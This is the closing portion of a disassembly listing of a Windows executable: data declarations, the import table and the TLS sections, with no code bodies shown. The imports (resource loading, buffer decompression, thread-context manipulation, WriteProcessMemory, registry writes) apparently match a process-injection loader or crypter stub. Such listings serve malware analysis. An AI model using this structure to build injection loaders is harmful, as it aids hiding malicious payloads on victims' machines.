dword_406DCC dd 0Ah dup(?) ; DATA XREF: CODE:0040402E�o
dword_406DF4 dd 0Ah dup(?) ; DATA XREF: CODE:00404033�o
dword_406E1C dd ? ; DATA XREF: CODE:00403FFB�o
; CODE:00404019�r
dword_406E20 dd ? ; DATA XREF: CODE:00404024�w
; CODE:0040456C�w
dword_406E24 dd ? ; DATA XREF: CODE:loc_40403D�o
; CODE:00404069�o ...
dword_406E28 dd 53h dup(?) ; DATA XREF: CODE:004042D0�o
; CODE:004042DF�o ...
dword_406F74 dd ? ; DATA XREF: CODE:00404248�o
; CODE:004042CA�r ...
byte_406F78 db ? ; DATA XREF: CODE:004043A4�w
; CODE:004043B3�r ...
align 4
dword_406F7C dd ? ; DATA XREF: CODE:004040A3�o
; CODE:004041D8�o ...
dword_406F80 dd ? ; DATA XREF: CODE:0040409E�o
; CODE:004040B1�r ...
dword_406F84 dd ? ; DATA XREF: CODE:0040408C�w
; CODE:004040BA�r ...
align 80h
BSS ends
;
; Imports from kernel32.dll
;
; Section 4. (virtual address 00007000)
; Virtual size : 000005EA ( 1514.)
; Section size in file : 00000600 ( 1536.)
; Offset to raw data for section: 00004000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Externs
; _idata
; DWORD __stdcall GetCurrentThreadId()
extrn __imp_GetCurrentThreadId:dword ; DATA XREF: GetCurrentThreadId�r
; DWORD __stdcall GetLastError()
extrn __imp_GetLastError:dword ; DATA XREF: GetLastError�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess�r
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn __imp_WriteFile:dword ; DATA XREF: WriteFile�r
; CODE:loc_401714�r
; DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
extrn __imp_SetFilePointer:dword ; DATA XREF: SetFilePointer�r
; BOOL __stdcall SetEndOfFile(HANDLE hFile)
extrn __imp_SetEndOfFile:dword ; DATA XREF: SetEndOfFile�r
extrn RtlUnwind:dword ; DATA XREF: CODE:loc_4010A4�r
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn __imp_ReadFile:dword ; DATA XREF: ReadFile�r
; CODE:loc_40170C�r
; void __stdcall RaiseException(DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments)
extrn RaiseException:dword ; DATA XREF: CODE:loc_401094�r
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
extrn __imp_GetStdHandle:dword ; DATA XREF: GetStdHandle�r
; DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh)
extrn __imp_GetFileSize:dword ; DATA XREF: GetFileSize�r
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn __imp_GetSystemTime:dword ; DATA XREF: GetSystemTime�r
; DWORD __stdcall GetFileType(HANDLE hFile)
extrn __imp_GetFileType:dword ; DATA XREF: GetFileType�r
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn __imp_CreateFileA:dword ; DATA XREF: CreateFileA�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandle�r
; LPSTR __stdcall GetCommandLineA()
extrn __imp_GetCommandLineA:dword ; DATA XREF: GetCommandLineA�r
; BOOL __stdcall TlsSetValue(DWORD dwTlsIndex, LPVOID lpTlsValue)
extrn __imp_TlsSetValue:dword ; DATA XREF: TlsSetValue�r
; LPVOID __stdcall TlsGetValue(DWORD dwTlsIndex)
extrn __imp_TlsGetValue:dword ; DATA XREF: TlsGetValue�r
; HLOCAL __stdcall LocalAlloc(UINT uFlags, SIZE_T uBytes)
extrn __imp_LocalAlloc:dword ; DATA XREF: LocalAlloc�r
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn __imp_GetModuleHandleA:dword ; DATA XREF: GetModuleHandleA�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn __imp_GetModuleFileNameA:dword ; DATA XREF: GetModuleFileNameA�r
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn __imp_FreeLibrary:dword ; DATA XREF: FreeLibrary�r
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn __imp_HeapFree:dword ; DATA XREF: HeapFree�r
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
extrn __imp_HeapReAlloc:dword ; DATA XREF: HeapReAlloc�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn __imp_HeapAlloc:dword ; DATA XREF: HeapAlloc�r
; HANDLE __stdcall GetProcessHeap()
extrn __imp_GetProcessHeap:dword ; DATA XREF: GetProcessHeap�r
;
; Imports from user32.dll
;
; LPSTR __stdcall CharNextA(LPCSTR lpsz)
extrn __imp_CharNextA:dword ; DATA XREF: CharNextA�r
;
; Imports from oleaut32.dll
;
; void __stdcall SysFreeString(BSTR bstrString)
extrn __imp_SysFreeString:dword ; DATA XREF: SysFreeString�r
; INT __stdcall SysReAllocStringLen(BSTR *pbstr, const OLECHAR *psz, unsigned int len)
extrn __imp_SysReAllocStringLen:dword ; DATA XREF: SysReAllocStringLen�r
;
; Imports from advapi32.dll
;
; LSTATUS __stdcall RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData)
extrn __imp_RegSetValueExA:dword ; DATA XREF: RegSetValueExA�r
; LSTATUS __stdcall RegOpenKeyA(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult)
extrn __imp_RegOpenKeyA:dword ; DATA XREF: RegOpenKeyA�r
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn __imp_RegCloseKey:dword ; DATA XREF: RegCloseKey�r
;
; Imports from kernel32.dll
;
; BOOL __stdcall WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
extrn __imp_WriteProcessMemory:dword ; DATA XREF: WriteProcessMemory�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn __imp_TerminateProcess:dword ; DATA XREF: TerminateProcess�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn __imp_Sleep:dword ; DATA XREF: Sleep�r
; DWORD __stdcall SizeofResource(HMODULE hModule, HRSRC hResInfo)
extrn __imp_SizeofResource:dword ; DATA XREF: SizeofResource�r
; BOOL __stdcall SetThreadContext(HANDLE hThread, const CONTEXT *lpContext)
extrn __imp_SetThreadContext:dword ; DATA XREF: SetThreadContext�r
; void __stdcall SetLastError(DWORD dwErrCode)
extrn __imp_SetLastError:dword ; DATA XREF: SetLastError�r
; DWORD __stdcall SetFilePointer_0(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
extrn __imp_SetFilePointer_0:dword ; DATA XREF: SetFilePointer_0�r
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn __imp_ResumeThread:dword ; DATA XREF: ResumeThread�r
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
extrn __imp_ReadProcessMemory:dword ; DATA XREF: ReadProcessMemory�r
; BOOL __stdcall ReadFile_0(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn __imp_ReadFile_0:dword ; DATA XREF: ReadFile_0�r
; LPVOID __stdcall LockResource(HGLOBAL hResData)
extrn __imp_LockResource:dword ; DATA XREF: LockResource�r
; HGLOBAL __stdcall LoadResource(HMODULE hModule, HRSRC hResInfo)
extrn __imp_LoadResource:dword ; DATA XREF: LoadResource�r
; BOOL __stdcall GetThreadContext(HANDLE hThread, LPCONTEXT lpContext)
extrn __imp_GetThreadContext:dword ; DATA XREF: GetThreadContext�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn __imp_GetProcAddress:dword ; DATA XREF: GetProcAddress�r
; HMODULE __stdcall GetModuleHandleA_0(LPCSTR lpModuleName)
extrn __imp_GetModuleHandleA_0:dword ; DATA XREF: GetModuleHandleA_0�r
; DWORD __stdcall GetFileSize_0(HANDLE hFile, LPDWORD lpFileSizeHigh)
extrn __imp_GetFileSize_0:dword ; DATA XREF: GetFileSize_0�r
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn __imp_GetFileAttributesA:dword ; DATA XREF: GetFileAttributesA�r
; DWORD __stdcall GetEnvironmentVariableA(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize)
extrn __imp_GetEnvironmentVariableA:dword
; DATA XREF: GetEnvironmentVariableA�r
; BOOL __stdcall FreeResource(HGLOBAL hResData)
extrn __imp_FreeResource:dword ; DATA XREF: FreeResource�r
; HRSRC __stdcall FindResourceA(HMODULE hModule, LPCSTR lpName, LPCSTR lpType)
extrn __imp_FindResourceA:dword ; DATA XREF: FindResourceA�r
; void __stdcall ExitProcess_0(UINT uExitCode)
extrn __imp_ExitProcess_0:dword ; DATA XREF: ExitProcess_0�r
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn __imp_DeleteFileA:dword ; DATA XREF: DeleteFileA�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn __imp_CreateProcessA:dword ; DATA XREF: CreateProcessA�r
; HANDLE __stdcall CreateFileA_0(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn __imp_CreateFileA_0:dword ; DATA XREF: CreateFileA_0�r
; BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists)
extrn __imp_CopyFileA:dword ; DATA XREF: CopyFileA�r
; BOOL __stdcall CloseHandle_0(HANDLE hObject)
extrn __imp_CloseHandle_0:dword ; DATA XREF: CloseHandle_0�r
;
; Imports from shell32.dll
;
; HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd)
extrn __imp_ShellExecuteA:dword ; DATA XREF: ShellExecuteA�r
; HINSTANCE __stdcall FindExecutableA(LPCSTR lpFile, LPCSTR lpDirectory, LPSTR lpResult)
extrn __imp_FindExecutableA:dword ; DATA XREF: FindExecutableA�r
;
; Imports from ntdll.dll
;
extrn __imp_RtlDecompressBuffer:dword ; DATA XREF: RtlDecompressBuffer�r
; Section 5. (virtual address 00008000)
; Virtual size : 00000004 ( 4.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00004600
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 408000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
TlsStart dd ? ; DATA XREF: .rdata:TlsDirectory�o
TlsEnd dd 7Fh dup(?) ; DATA XREF: .rdata:TlsEnd_ptr�o
_tls ends
; Section 6. (virtual address 00009000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00004600
; Flags 50000040: Data Shareable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 409000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd offset TlsEnd
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
align 200h
_rdata ends
end start